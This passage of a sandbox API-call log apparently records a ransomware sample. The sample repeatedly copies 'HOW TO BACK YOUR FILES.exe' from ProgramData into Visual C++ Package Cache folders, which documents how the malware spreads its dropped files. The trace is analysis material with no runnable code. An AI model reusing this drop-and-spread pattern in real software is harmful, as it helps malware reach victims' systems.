Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.025] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.025] GetLastError () returned 0x0 [0090.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.025] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.025] CloseHandle (hObject=0x120) returned 1 [0090.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.026] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.026] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.026] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.026] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0090.026] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0090.026] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.026] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.027] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.027] GetLastError () returned 0x0 [0090.027] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.027] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.027] CloseHandle (hObject=0x120) returned 1 [0090.027] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.027] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5dc1e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dc1e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.027] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.027] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.028] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0090.028] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0090.028] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.028] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.029] GetLastError () returned 0x0 [0090.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.029] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.029] CloseHandle (hObject=0x120) returned 1 [0090.029] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.029] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5dcb6860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dcb6860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.029] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.029] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.029] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0090.029] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0090.029] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.030] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.030] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.030] GetLastError () returned 0x0 [0090.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.030] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.030] CloseHandle (hObject=0x120) returned 1 [0090.031] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.031] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.031] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.031] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.031] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0090.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0090.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.032] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.032] GetLastError () returned 0x0 [0090.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.032] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.032] CloseHandle (hObject=0x120) returned 1 [0090.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.032] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.032] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.032] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.033] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0090.033] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0090.033] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.033] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.034] GetLastError () returned 0x0 [0090.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.034] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.034] CloseHandle (hObject=0x120) returned 1 [0090.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.034] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5de59780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5de59780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.034] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.034] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0090.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0090.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.035] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.035] GetLastError () returned 0x0 [0090.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.035] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.035] CloseHandle (hObject=0x120) returned 1 [0090.036] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.036] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.036] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.036] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.036] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0090.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0090.036] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.036] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.037] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.037] GetLastError () returned 0x0 [0090.037] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.037] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.037] CloseHandle (hObject=0x120) returned 1 [0090.037] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.037] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.037] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.037] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.038] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0090.038] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0090.038] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.038] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.038] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.039] 